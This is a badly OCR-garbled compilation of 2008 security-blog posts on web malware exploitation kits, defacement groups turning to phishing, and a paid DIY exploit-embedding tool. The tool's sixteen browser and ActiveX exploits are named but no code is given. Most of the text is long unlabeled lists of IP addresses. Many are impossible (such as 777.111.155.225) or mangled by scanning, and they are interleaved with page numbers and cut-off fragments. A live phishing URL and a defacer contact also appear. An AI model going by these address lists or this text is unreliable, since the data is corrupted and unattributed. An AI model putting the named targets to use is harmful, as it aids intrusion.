85.12.231.87 
98.61.81.52 
86.121.111.145 
84.54.154.4 
74.13.159.115 
84.3.49.61 
85.236.169.22 
89.188.44.44 
199.249.112.1 
69.31.84.58 
115.126.5.51 
128.63.2.53 
61.156.242.119 
66.196.84.168 
98.136.43.32 
74.86.115.16 
192.33.4.12 
87.239.22.51 
148.228.148.74 
77.41.97.152 
82.13.84.146 
11.213.125.16 
61.83.186.115 
85.136.134.87 
83.84.154.219 
24.132.173.187 
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777.111.155.225 
79.172.77.188 
89.174.127.12 
76.22.244.15 
174.132.89.3 
174.132.89.2 
64.29.151.221 
64.29.154.69 
64.29.144.69 
216.251.32.154 
121.137.245.192 
76.111.24.146 
89.32.94.21 
711.192.111.168 
216.39.58.87 
216.239.128.2 
216.239.138.163 
216.239.128.3 
81.211.28.114 
212.111.194.4 
81.176.76.11 
67.228.53.183 
67.228.22.132 
74.86.254.198 
78.159.126.231 
74.86.251.16 
74.86.254.192 
78.159.126.232 
78.159.112.245 
66.29.115.45 
64.21.16.199 
199.254.49.1 
85.233.164.62 
192.41.162.34 
192.26.92.34 
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87.239.22.61 
84.121.126.14 
91.89.41.43 
195.221.62.11 
59.6.178.231 
88.66.198.97 
75.79.63.156 
98.215.11.236 
76.226.111.7 
195.211.237.211 
174.36.56.172 
67.186.121.38 
69.234.146.136 
75.118.162.91 
98.246.115.7 
67.214.185.157 
68.114.3.67 
68.42.64.37 
125.139.251.221 
71.199.92.183 
66.228.118.67 
24.121.54.157 
75.62.7.172 
67.214.139.212 
123.214.182.48 
75.138.113.226 
85.138.226.221 
84.12.44.1 
96.32.132.179 
68.45.12.57 
75.34.33.45 
216.245.196.38 
24.136.214.23 
75.57.61.6 
98.199.233.231 
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155.127.125.26 
75.134.53.195 
24.196.2.132 
66.138.7.3 
93.197.175.194 
44.131.151.42 
98.234.74.152 
174.137.49.186 
68.42.64.73 
76.122.23.92 
76.112.174.28 
83.93.18.155 
69.162.118.118 
129.44.186.37 
75.14.23.245 
196.21.236.29 
216.245.197.69 
76.73.12.11 
122.111.56.235 
92.237.25.216 
199.19.57.1 
74.63.221.181 
221.126.238.216 
81.84.73.235 
69.72.243.17 
84.21.24.12 
84.125.47.12 
64.191.53.8 
79.79.45.152 
71.192.183.218 
76.78.215.121 
147.96.32.146 
61.46.112.127 
86.15.224.146 
911.123.159.112 
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221.127.241.126 
79.172.83.81 
82.176.183.9 
82.32.28.246 
69.147.83.187 
69.147.83.188 
88.161.134.125 
89.229.198.123 
118.126.4.86 
64.158.219.3 
77.92.91.135 
77.92.89.142 
98.136.92.79 
69.216.133.214 
125.139.235.178 
99.61.78.15 
195.182.57.52 
222.35.137.234 
222.35.137.235 
67.215.243.211 
222.35.137.236 
195.182.57.28 
3.1.2.1 

3.1.2.2 

371.253 
196.2.198.241 
196.2.198.242 
61.188.87.143 
77.221.133.168 
77.221.133.194 
91.195.124.3 
89.149.244.19 
92.241.163.12 
92.241.163.13 
92.241.163.17 
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92.241.163.18 
92.241.163.19 
92.241.163.21 
64.72.112.13 
64.72.112.12 
194.165.4.62 
194.165.4.61 
194.165.4.63 
192.54.112.34 
192.42.93.34 
194.165.4.67 
77.221.153.171 
88.212.221.41 
92.241.161.58 
92.241.162.58 
195.182.57.26 
195.182.57.29 
77.221.153.169 
77.221.153.168 
222.35.137.237 
195.182.57.27 
85.17.165.162 
85.17.165.132 
216.39.58.235 
216.39.58.236 
216.39.58.237 
216.39.58.192 
216.39.58.193 
216.39.58.194 
216.39.58.195 
216.39.58.196 
216.39.58.197 
222.35.137.238 
67.215.243.212 
193.169.12.61 
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66.71.245.18 
66.71.245.19 
212.111.194.34 
193.68.194.1 
78.129.166.6 
78.129.166.5 
78.129.166.255 
21.214.23.151 
69.248.87.164 
85.224.249.147 
64.23.245.111 
69.162.112.67 
24.147.248.77 
77.125.131.55 
95.25.31.231 
89.174.124.89 
89.178.8.185 
66.212.155.141 
77.111.149.236 
91.146.142.197 
199.7.64.126 
91.98.31.133 
91.98.31.132 
67.215.243.214 
77.232.76.14 
69.89.21.67 
69.89.16.4 
92.61.146.189 
66.176.239.188 
92.83.47.99 
68.48.17.196 
76.187.141.116 
212.2.136.78 
79.112.73.244 
115.48.56.141 
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79.119.183.124 
68.63.32.164 
2.83.47.99 
117.198.163.127 
78.96.117.216 
199.19.53.1 
78.129.166.233 
78.129.166.235 
78.129.166.234 
67.215.243.213 
67.164.7.67 
66.199.254.3 
115.126.5.52 
174.36.195.192 
83.98.192.19 
83.98.156.221 
83.98.156.222 
77.221.133.191 
77.221.133.181 
77.221.133.185 
88.212.221.42 
193.169.12.62 
222.35.137.25 
78.159.114.88 
79.132.198.48 
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194.226.96.8 
12.214.96.191 
24.136.214.48 
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71.227.123.55 
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89.248.166.57 
94.23.114.18 
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98.136.92.76 
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68.178.254.116 
64.136.44.123 
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64.136.25.254 
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66.199.232.92 
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quality and reliability. Then again, [3]when there’s demand for web malware exploitation kits, 
there’s also supply of what looks like commodity ones for the time being. The irony is what 
the sellers of these could actually be making more money from the services that they offer 
with the kit, than from volume based selling of the kits. What’s to come? Hybrid web malware 
exploitation kits with all-in-one exploits set on a per OS, and software, not just browser basis, 
putting the [4]emphasis on client side vulnerabilities even better. 


Related posts: 


[5]The WebAttacker in Action 

[6]Nuclear Malware Kit 

[7]The Random JS Malware Exploitation Kit 

[8]Metaphisher Malware Kit Spotted in the Wild 

[9]The Black Sun Bot 

[10]The Cyber Bot 

[11]Google Hacking for MPacks, Zunkers and WebAttackers 


[12]The IcePack Malware Kit in Action 


[13]MPack and IcePack Localized to Chinese 
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79.115.37.239 
211.215.252.126 
78.152.179.11 
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211.172.232.125 
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4.4.25 Web Site Defacement Groups Going Phishing (2008-04-28 08:23) 
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Following a recent post commenting on [1]changing phishing tactics, more evidence of web 
site defacement groups’ vertical integration in the underground market in respect to hosting 
phishing pages on the defaced hosts, is starting to emerge. Take for instance yet another cur- 
rently live phishing page - bamaangels.net/photogallery/content/Models/Brigitte/boa . The site 
is known to [2]has been defaced in the past, and it looks like it’s been re-defaced again, this 
time hosting a single phishing page within, compared to the examples | provided in a previous 
post. The current defacement located at - bamaangels.net/photogallery/content/Mode- 
Is/Brigitte/deface.htm - reads : 


" Defaced by Zeus ;) contacto: z3us @ live.com Saludos: Juan Pablo :D " 
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88.171.125.96 
79.115.225.2 
66.52.17.156 
217.29.76.13 
195.66.241.178 
213.63.151.96 
69.162.114.163 
122.124.131.249 
78.37.241.71 
83.2.169.14 
83.29.56.146 
217.197.253.132 
77.239.68.38 
87.116.244.16 
95.76.124.96 
198.177.253.142 
124.122.91.173 
217.75.56.78 
82.131.239.92 
189.81.233.95 
77 (253.15.91 
217.132.191.122 
77.239.71.251 
85.137.234.211 
88.244.235.137 
79.191.24.32 


14687 


124.121.183.248 
59.95.214.156 
78.177.236.67 
67.91.182.112 
79.121.5.93 
79.184.38.184 
84.224.76.244 
88.243.244.141 
77.22.125.13 
89.74.19.174 
79.164.56.192 
85.136.128.59 
82.146.53.7 
216.39.62.126 
216.39.62.113 
216.39.62.114 
74.86.134.37 
74.86.118.187 
212.85.64.4 
89.41.46.63 
125.139.235.164 
77.96.189.8 
85.197.99.29 
88.134.126.237 
89.114.134.3 
85.17.184.31 
83.149.98.167 
85.17.111.111 
74,52.238.247 
199.249.113.1 
87.242.112.34 
219.76.235.93 
125.139.235.149 
222.233.186.82 
24.93.118.199 
14688 


79.114.152.173 
71.6.211.122 
89.35.28.41 
91.66.178.79 
79.116.4.156 
78.97.15.238 
79.115.12.6 
87.236.186.174 
89.136.67.65 
79.117.181.188 
79.112.28.155 
79.112.57.16 
79.113.68.83 
85.64.54.195 
79.114.235.181 
79.114.81.1 
79.117.94.54 
67.222.131.126 
77.127.96.54 
79.113.69.156 
79.113.74.213 
84.58.175.128 
79.117.166.43 
65.75.189.85 


123.213.237.165 


211.32.122.91 
71.6.211.95 
82.137.47.165 
86.123.223.147 
89.136.147.235 
89.42.117.43 
77.111.178.36 
77.127.2.44 
79.113.177.166 
81.196.87.187 


14689 


91.122.59.122 
79.116.75.136 
77.126.73.119 
79.111.65.43 
79.112.24.93 
79.117.139.239 
81.196.76.3 
218.254.77.5 
82.77.161.74 
82.231.222.174 
79.113.68.246 
86.122.57.1 
38.14.18.25 
69.72.237.212 
79.113.74.59 
81.196.76.152 
86.126.159.241 
89.46.37.32 
78.37.135.31 
79.113.64.54 
79.117.89.4 
78.37.197.147 
79.113.65.211 
79.113.73.188 
86.124.231.174 
79.113.74.243 
79.117.154.192 
86.125.218.226 
79.113.74.85 
911.122.187.194 
66.197.241.15 
79.117.167.151 
82.81.193.128 
89.79.122.133 
91.67.116.71 
14690 


195.16.61.173 
FIA2ZTT 5S 
79.117.159.236 
79.117.86.86 
211.174.128.119 
78.37.14.43 
79.117.131.247 
79.117.219.32 
89.137.211.69 
89.32.171.33 
79.117.85.167 
79.118.231.1 
79.117.164.198 
79.117.188.192 
89.137.128.144 
89.165.211.21 
78.37.178.38 
79.183.129.199 
216.39.62.111 
216.39.62.112 
72.167.131.113 
85.197.99.39 
82.19.138.237 
85.28.145.155 
218.139.78.81 
84.232.179.244 
86.122.62.216 
68.54.165.237 
68.189.174.131 
69.216.97.6 
69.221.34.16 
212.251.193.194 
217.132.57.14 
217.132.157.4 
59.98.57.71 


14691 


67.131.54.173 
84.25.2.69 
76.191.112.184 
124.199.53.254 
218.144.28.72 
218.217.179.159 
218.239.184.85 
85.178.234.177 
86.55.168.147 
86.121.38.84 
222.235.171.159 
59.151.224.185 
221.154.255.171 
64.191.27.152 
211.231.54.12 
61.24.174.119 
62.182.75.17 
81.196.77.5 
86.121.241.151 
86.126.183.162 
218.153.161.97 
82.192.42.54 
212.251.194.96 
84.232.179.5 
86.121.161.194 
222.255.222.37 
62.16.141.75 
68.95.255.39 
125.175.141.34 
221.147.19.47 
81.196.77.123 
61.252.186.19 
62.65.242.229 
62.182.76.191 
69.139.151.25 
14692 


ts 2F Brigitte 2Fboa/)! 


Karnal version |- Bio 


The fact that web site defacements groups are going into phishing, and as we've already 
seen numerous times, abusing the access to the host to serve malware, with their malicious 
economies of scale type of automated defacement approaches and web application vulnera- 
bilities exploitation, this is only going to get worse. One thing’s for sure - phishers, spammers, 
malwaware authors, and now web site defacements groups are consolidating, or even if there 
are exceptions, those exceptions are figuring out how to vertically integrate and build the ca- 
pability to participate in multiple malicious activities simultaneously. 


1. http: //ddanchev. blogspot .com/2008/04/phishing-tactics-evolving. html 
2. http: //www.zone-h. org/component/option, com_mirrorwrp/Itemid, 160/id, 7081824/ 
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85.26.37.224 
58.91.42.37 


211.243.151.251 


62.65.241.28 
61.252.186.132 
69.249.131.245 
81.245.48.171 
85.178.246.148 
85.64.52.3 
195.81.52.91 
69.216.129.251 
81.176.226.53 
195.3.144.112 
193.46.236.232 
62.85.45.66 
58.65.239.13 
69.25.142.42 
75.126.139.218 
75.126.132.7 
58.65.239.11 
58.65.234.82 
58.65.234.81 
66.36.242.66 
81.2.226.163 
89.253.239.25 
213.219.13.131 
72.29.67.31 
72.29.67.32 
199.7.66.44 
83.98.157.142 
$3:98,15/232 
88.255.78.255 
75.126.139.219 
66.118.187.81 
64.28.177.139 


14693 


216.195.61.149 
216.195.62.212 
216.195.63.9 
122.225.36.19 
213.146.149.134 
61.152.169.14 
216.195.56.79 
216.195.57.156 
92.238.237.137 
66.98.145.18 
61.61.61.61 
71.2.114.245 
64.215.112.159 
99.164.63.238 
67.242.7.94 
95.28.62.24 
76.125.59.51 
122.26.21.122 
99.228.192.22 
79.116.35.155 
88.152.179.36 
99.141.42.189 
12.218.112.153 
89.28.99.155 
67.66.62.114 
79.125.233.162 
78.152.184.39 
79.118.197.41 
79.114.197.98 
79.114.75.197 
92.115.84.184 
74.54.56.227 
67.15.253.219 
213,155-1.25 
213.155.2.69 
14694 


213.155.2.68 
64.235.35.193 
64.235.41.14 
64.235.45.3 
212.97.132.148 
62.16.46.235 
85.12.211.94 
91.146.53.179 
98.197.125.229 
83.149.95.197 
89.248.162.158 
89.248.162.161 
213.251.128.129 
213.186.33.87 
213.251.188.129 
85.232.154.192 
79.114.97.229 
81.13.158.36 
65.49.16.16 
216.218.131.2 
213.246.167.131 
216.218.132.2 
69.147.83.149 
69.147.83.151 
69.147.83.152 
69.147.83.153 
69.147.83.154 
69.147.83.146 
69.147.83.147 
69.147.83.148 
128.112.129.15 
65.38.67.52 
65.38.67.51 
67.221.178.53 
82.146.34.32 


14695 


72.167.232.63 
82.146.39.76 
216.69.185.21 
216.69.185.32 
79.135.181.19 
79.135.181.18 
64.247.59.155 
64.247.59.152 
66.199.254.2 
77.221.129.178 
77.221.138.146 
77.232.81.1 
77.232.91.184 
77.232.66.6 
194.83.244.131 
66.199.232.91 
69.89.31.237 
174.37.99.113 
77.253.86.54 
72.167.232.57 
77.221.133.184 
88.212.221.46 
124.99.238.13 
85.177.229.31 
85.178.222.61 
59.125.231.241 
89.188.96.92 
216.239.128.4 
216.239.128.5 
66.212.28.62 
67.215.231.254 
62.182.77.19 
195.216.243.27 
81.176.229.37 
93.127.128.22 
14696 


74.86.68.228 
67.228.121.192 
195.5.117.227 
79.114.144.82 
89.37.27.73 
89.38.14.23 
77.221.133.193 
77.221.133.192 
64.251.8.113 
217.112.83.247 
213.155.2.79 
96.9.39.89 
216.21.235.44 
216.21.232.74 
72.167.232.6 
72.36.219.162 
79.119.84.66 
79.125.41.181 
116.65.199.187 
121.181.5.75 
94.189.175.182 
121.129.114.231 
61.82.161.51 
75.67.84.5 
99.244.63.118 
76.229.181.139 
76.126.193.226 
67.189.82.129 
86.22.144.151 
24.147.248.55 
69.176.39.23 
76.213.136.99 
71.147.53.129 
68.84.32.74 
71.92.146.196 


14697 


76.18.239.54 
99.232.236.219 
72.51.154.63 
75.71.227.182 
76.189.142.3 
76.116.28.39 
72.129.27.234 
85.197.238.216 
67.171.88.176 
69.148.71.61 
76.196.1.142 
98.172.26.54 
72.136.137.1 
67.149.133.182 
74.137.211.81 
75.177.88.187 
66.212.155.135 
12.216.54.177 
216.66.1.2 
216.99.49.126 
64.253.1.6 
89.3.54.84 
83.27.77.18 
75.65.152.126 
69.246.61.113 
99.228.62.174 
65.29.125.35 
99.229.58.233 
24.44.191.232 
217.16.16.124 
172.22.159.39 
189.136.54.251 
89.187.49.4 
68.42.187.195 
89.125.31.83 
14698 


216.21.232.127 
216.21.231.61 
84.94.74.223 
199.7.67.44 
69.122.77.115 
99.227.127.92 
85.243.222.218 
144.162.56.163 
69.245.11.233 
71.239.81.62 
189.82.186.167 
89.216.213.241 
24.234.67.15 
98.221.92.181 
82.22.78.169 
98.194.129.99 
94.189.157.83 
24.61.29.61 
76.197.187.183 
91.117.9.61 
89.74.24.149 
77.127.211.178 
24.98.32.142 
212.174.25.241 
212.78.44.91 
194.169.192.131 
89.136.146.112 
79.114.92.75 
82.37.145.218 
86.123.247.45 
89.33.91.15 
213.146.149.169 
62.231.91.77 
82.79.233.221 
77.126.41.91 


14699 


811.172.112.113 
83.11.29.2 
83.138.225.37 
67.74.57.11 
84.2.152.6 
89.178.187.251 
85.249.14.142 
68.74.57.31 
64.191.119.197 
195.189.81.163 
86.123.131.78 
86.127.92.162 
89.137.26.33 
65.38.67.37 
76.254.7.27 
79.114.153.232 
85.183.142.65 
77.81.232.76 
911.197.163.178 
79.113.2.128 
79.113.4.173 
86.125.118.161 
99.146.96.72 
64.21.48.156 
86.121.253.241 
91.67.119.236 
92.112.34.43 
77.111.153.219 
81.98.97.126 
99.133.161.253 
64.191.112.197 
79.114.156.232 
89.41.94.111 
65.75.191.14 
99.147.148.59 
14700 


82.255.226.184 
89.37.99.88 
93.81.33.31 
125.129.26.177 
81.198.22.45 
82.212.128.158 
85.178.238.8 
79.116.134.179 
82.79.67.253 
86.123.5.149 
86.125.118.91 
79.113.2.94 
79.112.92.124 
79.114.153.144 
86.55.168.15 
89.41.94.142 
82.79.233.83 
85.94.46.26 
82.137.14.19 
82.77.119.99 
85.121.94.56 
76.76.3.149 
77.98.188.162 
79.113.2.7 
84.58.121.234 
82.251.224.78 
82.77.166.163 
82.77.86.144 
89.178.21.96 
78.48.212.217 
79.112.91.136 
79.119.155.8 
86.123.147.62 
92.112.63.224 
79.113.5.131 


14701 


89.41.94.191 
69.129.59.26 
67.159.41.89 
78.55.178.86 
79.117.35.159 
79.117.72.155 
86.122.156.236 
212.227.251.161 
79.165.168.136 
85.182.43.95 
91.196.236.57 
79.114.152.232 
89.137.186.6 
218.232.195.79 
58.225.226.43 
76.126.72.41 
71.249.231.112 
85.15.69.38 
89.36.52.237 
89.45.112.171 
87.242.18.243 
89.136.7.132 
99.155.199.199 
85.178.219.199 
86.69.249.95 
86.126.214.86 
121.133.148.9 
222.118.177.175 
66.63.174.26 
193.227.242.23 
79.112.68.144 
89.136.196.38 
92.112.179.124 
142.177.228.18 
89.41.168.145 
14702 


4.4.26 DIY Exploit Embedding Tool - A Proprietary Release (2008-04-28 11:45) 
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Remember the [1]reprospective on DIY exploit embedding tools, those cybercrime 1.0 
point’n’click exploits serving generators? Despite that the cybercrime 2.0 has to do with 
malicious economies of scale, that is the use of web malware exploitation kits compared to 
their 1.0 alternative, the DIY tools, such tools continue to be developed, like this proprietary 
one including sixteen exploits for the buyer to take advantage of, if she’s willing to invest 
£100 (GBP) of course. Exploits listed : 


- D-Link MPEG4 VAPGDecoder ActiveX 

- Macrovision Installshield Activex 

- MySpace Uploader Activex 

- Symantec BackupExec ActiveX 

- Yahoo! JukeBox ActiveX 

- Microsoft Works Activex (Oday) 

- Microsoft Internet Explorer MSO6-014 (MDAC) 
- Microsoft Internet Explorer MSO7-009 

- Facebook Uploader Activex 

- Microsoft DirectSpeechSynthesis Activex 
- Realplayer ActiveX 

- WinZip FileView ActiveX 

- Yahoo Messenger Webcam ActiveX 

- Microsoft Internet Explorer MSO06-013 

- Microsoft Internet Explorer MSO7-004 

- Microsoft Internet Explorer MSO7-055 


1473 


89.42.124.153 
66.63.174.28 
59.22.162.77 
89.42.124.117 
72.232.5.33 
33.5.232.72 
86.127.186.84 
89.32.73.26 
91.67.119.39 
79.117.181.149 
67.228.213.11 
91.67.119.58 
85.178.238.224 
67.215.229.45 
87.242.17.66 
66.197.222.5 
79.114.153.112 
84.38.81.65 
79.114.39.215 
85.65.36.23 
86.127.5.58 
121.179.6.41 
77.81.147.22 
89.44.37.19 
79.115.21.216 
91.122.61.241 
84.38.86.116 
85.64.231.36 
88.134.126.229 
66.197.245.157 
74.86.115.5 
74.86.149.178 
74.86.149.177 
69.221.244.36 
84.2.126.181 


14703 


84.68.92.237 
86.125.53.216 
79.6.27.28 
82.32.251.252 
84.94.7.148 
89.134.2.72 
64.71.133.136 
89.77.241.45 
116.72.67.123 
212.92.248.226 
64.65.1.112 
174.133.148.218 
174.133.148.219 
216.69.185.24 
216.69.185.16 
72.167.131.127 
212.117.185.75 
193.124.83.69 
198.6.1.65 
193.124.22.65 
124.217.248.113 
74.54.56.236 
67.15.47.189 
66.249.5.25 
79.115.21.38 
79.117.181.242 
97.74.144.182 
63.246.159.3 
63.246.159.9 
84.121.121.129 
33.222.17.16 
84.121.121.117 
94.229.64.119 
72.14.212.131 
71.25.19.23 
14704 


75.34.43.192 
76.123.156.63 
89.125.34.81 
66.212.16.212 
59.93.14.152 
89.41.38.197 
66.196.43.228 
72.37.221.244 
59.95.19.146 
68.252.248.139 
F4,F39:129.227 
79.12.79.197 
84.149.119.24 
89.136.81.176 
64.131.248.155 
82.37.182.165 
86.124.215.42 
89.123.32.148 
89.34.251.144 
212.139.98.82 
217.236.247.17 
89.42.92.96 
74.78.118.52 
861.213.152.116 
89.132.12.174 
82.146.53.39 
77.98.188.135 
91.65.168.17 
74.86.134.162 
89.133.185.216 
86.127.6.159 
87.19.147.84 
69.221.229.162 
82.79.65.168 
86.144.78.184 


14705 


87.2.85.231 
67.74.11.71 
142.217.62.13 
69.248.151.153 
82.53.94.164 
75.137.186.211 
78.49.76.214 
79.16.93.98 
75.28.64.188 
81.65.238.14 
84.149.71.147 
84.54.239.198 
68.85.133.52 
811.182.162.157 
85.178.45.26 
67.159.41.119 
69.147.83.155 
69.147.83.159 
69.147.83.176 
69.147.83.177 
69.147.83.178 
69.147.83.179 
75.36.159.225 
75.49.2.172 
82.59.114.29 
64.38.5.126 
69.159.49.146 
69.238.171.27 
85.237.18.122 
66.71.21.31 
75.126.231.132 
89.33.57.188 
85.234.157.216 
12.217.177.168 
81.4.253.84 
14706 


84.133.38.56 
86.71.39.119 
83.184.25.124 
86.124.195.7 
89.35.175.117 
75.41.15.168 
81.77.36.238 
88.65.76.194 
74.78.114.62 
82.79.188.122 
67.14.58.11 
68.59.1.82 
82.155.52.73 
83.181.173.99 
81.98.121.164 
85.176.177.113 
86.126.152.97 
72.249.96.26 
78.2.92.88 
83.255.126.121 
84.58.175.148 
86.126.65.19 
88.214.198.35 
8.9.64.198 
89.145.96.145 
198.145.182.7 
24.212.72.73 
82.54.211.235 
67.14.18.22 
85.178.25.58 
82.39.13.223 
82.41.246.247 
72.36.142.255 
79.66.59.137 
81.182.29.172 


14707 


82.158.152.78 
72.249.76.56 
121.247.251.118 
69.55.249.1 
86.126.136.52 
88.64.44.42 
82.137.45.155 
67.33.128.5 
74.13.153.198 
83.191.246.89 
213.155.1.146 
63.246.133.171 
63.246.133.174 
63.246.159.11 
74.86.115.14 
74.86.253.176 
67.228.144.127 
174.36.243.5 
222.73.37.253 
95.84.138.36 
92.84.23.131 
216.229.12.51 
63.213.13.152 
81.177.24.92 
77.221.128.22 
71.123.51.158 
69.162.115.187 
59.161.57.9 
83.132.197.64 
59.162.178.7 
81.57.246.164 
82.228.224.232 
93.186.171.182 
83.132.196.46 
188.24.58.217 
14708 


117.199.112.233 
78.62.123.35 
67.43.48.99 
121.139.71.59 
186.28.184.166 
62.19.251.8 
41.214.195.24 
189.195.22.249 
89.137.112.222 
91.212.41.246 
91.195.124.21 
84.22.161.11 
79.135.181.164 
79.135.181.162 
79.135.181.163 
85.254.47.56 
75.35-18.172 
35.88.17.39 
88.156.39.27 
91.195.98.36 
77.254.156.85 
85.137.227.245 
87.239.22.94 
123.214.182.67 
71.239.156.182 
125.167.52.118 
74.53.38.211 
74.53.178.36 
64.71.133.133 
66.197.235.215 
74.86.115.9 
216.21.231.69 
72.51.43.223 
81.177.24.7 
79.135.168.36 


14709 


79.135.168.38 
66.63.174.47 
74.86.43.145 
82.7.229.249 
69.162.114.162 
84.122.127.184 
66.197.255.184 
811.176.226.194 
66.197.255.185 
74.53.143.178 
74.53.143.179 
83.229.186.19 
83.229.187.19 
195.182.57.49 
195.182.57.48 
212.97.132.146 
213.211.32.34 
66.84.41.58 
65.254.254.123 
65.254.254.122 
85.13.219.91 
82.146.34.248 
82.144.164.226 
99.248.165.168 
38.54.91.15 
64.86.17.185 
99.248.177.227 
71.17.155.4 
71.229.123.1 
76.78.121.145 
99.228.246.95 
99.243.17.236 
76.76.6.232 
86.125.118.92 
89.32.51.227 
14710 


67.227.136.138 
72.52.214.166 
72.52.214.167 
67.228.5.124 
211.95.79.58 
59.125.231.252 
96.9.185.183 
96.9.185.181 
96.9.185.184 
96.9.185.185 
96.9.185.182 
217.26.144.5 
218.139.78.88 
95.211.8.134 
95.211.8.171 
69.61.19.223 
76.74.236.21 
65.55.194.97 
65.55.194.71 
77.221.133.162 
194.54.88.37 
194.54.88.43 
78.46.148.49 
69.16.232.8 
69.16.233.195 
69.16.233.194 
83.133.119.254 
83.133.126.32 
83.133.121.153 
216.239.138.9 
217.119.57.22 
193.33.61.2 
66.36.231.236 
217.199.176.121 


217.68.243.17 
14711 


85.214.136.249 
95.211.6.161 
216.239.138.231 
71.57.224.166 
213.63.151.92 
79.121.57.228 
77.254.128.31 
78.157.82.12 
64.136.25.253 
64.136.44.124 
82.197.131.11 
212.97.132.138 
212.97.132.133 
216.255.185.226 
216.255.185.227 
66.232.117.38 
89.111.171.191 
79.174.72.131 
194.154.75.191 
82.79.128.174 
92.243.65.98 
92.243.65.99 
87.117.192.45 
77.254.252.186 
94.42.17.3 
88.238.125.165 
89.79.66.89 
77.253.116.137 
83.9.75.218 
94.42.25.61 
72.29.81.173 
72.29.81.174 
72.29.81.175 
67.228.37.8 


67.228.38.184 
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DSYEEMIOVEVIEW, 


Secunia System Score 77% Up-To-Date 
Software Detected 17 Insecure 
5 End-of-Life 
72 Up-To-Date 
Secunia PSI Status <> Monitoring your software.. 
ASeCure Sorat: 
© Adobe Flash Player 9.x 9.0.16.0 ela) 
se | Adobe Flash Player 9.x 9.0.28.0 ela) 
Adobe Photoshop CS2 9.0(9.0x198) & 
@ Adobe SVG Viewer 3.x 3, 02, 0, 91 ?) 
8 Macromedia Dreamweaver 8.x 8.0.0.2734 
8 Macromedia Flash 8.x 8.0.0.478 7) 
8 Macromedia Flash Player 6.x 6.0.79.0 @ 
8 Microsoft .NET Framework 1.x 1.1.4322.2032 7) 
@ Sun Java JRE 1.5.x / 5.x 5.0.110.3 ea) 
@ Sun Java JRE 1.5.x / 5.x 5.0.60.5 G60 
@ Sun Java JRE 1.5.x / 5.x 5.0.90.3 1a) 
@ Sun Java JRE 1.5.x / 5.x 5.0.100.3 ela) 
@ Sun Java JRE 1.5.x / 5.x 5.0.110.3 G60 
@ Sun Java JRE 1.6.x / 6.x 6.0.10.6 ela) 


With the now commodity web malware exploitation kits and their modularity streamlining "in- 
novation" in the field, such DIY tools are only a fad compared to malicious parties’ interest in 
exploiting as many people as possible, without putting extra efforts in the process (malicious 
economies of scale). And with the [2]overall proliferation of client-side vulnerabilities, and the 
surprisingly [3]high success rate of exploiting outdated and already patched vulnerabilities on 
a large scale (Stormy Wormy), [4Jensuring your client-side applications are vulnerable to zero 
days only is highly recommended. 


1. http: //ddanchev. blogspot .com/2007/09/diy-exploits-embedding-tools.htm 


2. http: //ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 
3. http: //ddanchev. blogspot .com/2007/07/malware-embedded-sites-increasing.htm 
4. http://psi.secunia.com/ 
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193.232.128.6 
74.52.88.142 
75.126.226.251 
83.222.23.172 
83.222.23.122 
213.186.118.16 
212.94.77.2 
212.94.64.216 
212.94.75.24 
212.94.75.23 
188.93.212.39 
188.93.212.212 
65.254.254.144 
82.137.41.49 
67.152.43.83 
86.125.248.54 
222.144.77.171 
222.147.163.42 
69.141.7.178 
68.158.7.53 
68.84.55.231 
76.211.27.124 
92.47.138.92 
99.227.84.87 
69.162.118.75 
82.31.198.142 
58.91.28.37 
121.187.135.95 
93.1.15.7 
221.246.89.194 
71.63.42.159 
77.81.181.84 
89.18.17.133 
69.243.52.253 
71.239.31.56 
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74.137.18.17 
89.45.15.6 
411.214.213.151 
64.86.28.14 
121.148.54.74 
125.177.132.141 
17.135.21.35 
61.252.186.218 
75.95.87.65 
76.127.216.196 
79.114.197.211 
76.19.165.163 
88.165.246.17 
24.176.141.236 
24.19.132.45 
74.133.11.111 
99.137.86.223 
125.175.142.145 
69.14.43.54 
81.95.181.153 
85.178.248.175 
88.178.89.6 
65.135.99.23 
91.66.22.238 
211.224.159.254 
219.114.246.167 
99.139.252.252 
45.125.59.23 
222.158.172.133 
69.162.117.87 
99.254.25.39 
114.145.142.92 
24.193.179.238 
78.84.11.145 


89.41.45.39 
14714 


75.23.121.239 
78.84.175.11 
79.117.194.187 
69.162.111.227 
77.126.38.28 
79.112.195.119 
79.177.165.28 
89.168.237.113 
85.181.68.23 
192.26.92.32 
24.55.193.11 
72.36.142.251 
89.76.132.4 
83.21.218.125 
86.199.158.26 
87.6.38.46 
89.139.122.94 
98.195.139.5 
193.33.179.162 
78.52.86.17 
79.179.165.137 
84.114.167.165 
81.1.255.134 
89.132.228.167 
89.132.89.169 
81.16.94.132 
78.55.196.69 
82.57.33.194 
84.236.122.83 
66.79.171.146 
217.199.188.61 
89.34.222.4 
218.16.121.3 
212.181.91.4 
65.38.67.41 
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89.137.159.82 
85.11.183.83 
82.36.215.196 
85.66.49.199 
84.232.178.16 
89.139.76.24 
86.122.254.124 
89.139.178.198 
71.228.246.37 
78.96.168.64 
78.96.116.217 
69.255.232.185 
75.23.122.65 
98.198.174.94 
24.127.86.49 
193.33.179.165 
86.55.84.82 
216.194.127.239 
86.126.13.71 
195.64.185.239 
77.81.227.89 
89.18.18.9 
86.124.88.4 
91.196.45.25 
86.127.213.218 
86.121.1.98 
86.122.171.65 
86.124.85.192 
89.178.41.237 
82.79.233.43 
84.94.12.39 
89.136.62.4 
79.112.93.121 
64.21.48.162 
89.137.85.163 
14716 


89.178.45.86 
211.3.9.123 
82.79.134.15 
84.236.72.143 
89.43.236.175 
89.137.215.171 
84.95.115.19 
198.6.1.161 
87.68.48.66 
79.112.211.67 
79.114.95.196 
79.114.243.182 
79.177.166.197 
128.223.32.35 
78.55.64.128 
82.79.239.184 
79.119.157.98 


217.233.112.144 


79.114.93.225 
74.86.253.99 
79.113.35.218 
86.126.23.69 
89.45.15.181 
79.112.196.9 
76.254.2.122 
68.44.61.216 
79.119.175.27 
86.122.168.181 
89.33.45.164 
89.179.69.16 
77.125.69.48 
83.253.242.49 
87.69.34.173 
89.41.172.217 
89.43.182.95 


14717 


99.139.49.37 
66.63.177.99 
66.71.245.2 
198.6.1.181 
66.71.245.3 
91.122.97.154 
64.237.45.34 
64.94.136.13 
64.94.136.11 
83.9.244.29 
86.125.186.177 
86.126.112.4 
211.95.79.114 
38.113.185.91 
38.113.184.1 
69.57.168.227 
62.182.74.148 
811.222.136.195 
81.177.22.144 
81.9.5.195 
81.9.5.199 
67.185.85.163 
89.44.213.155 
76.94.238.253 
79.113.98.41 
98.148.15.51 
79.113.227.61 
89.123.31.7 
69.86.7.97 
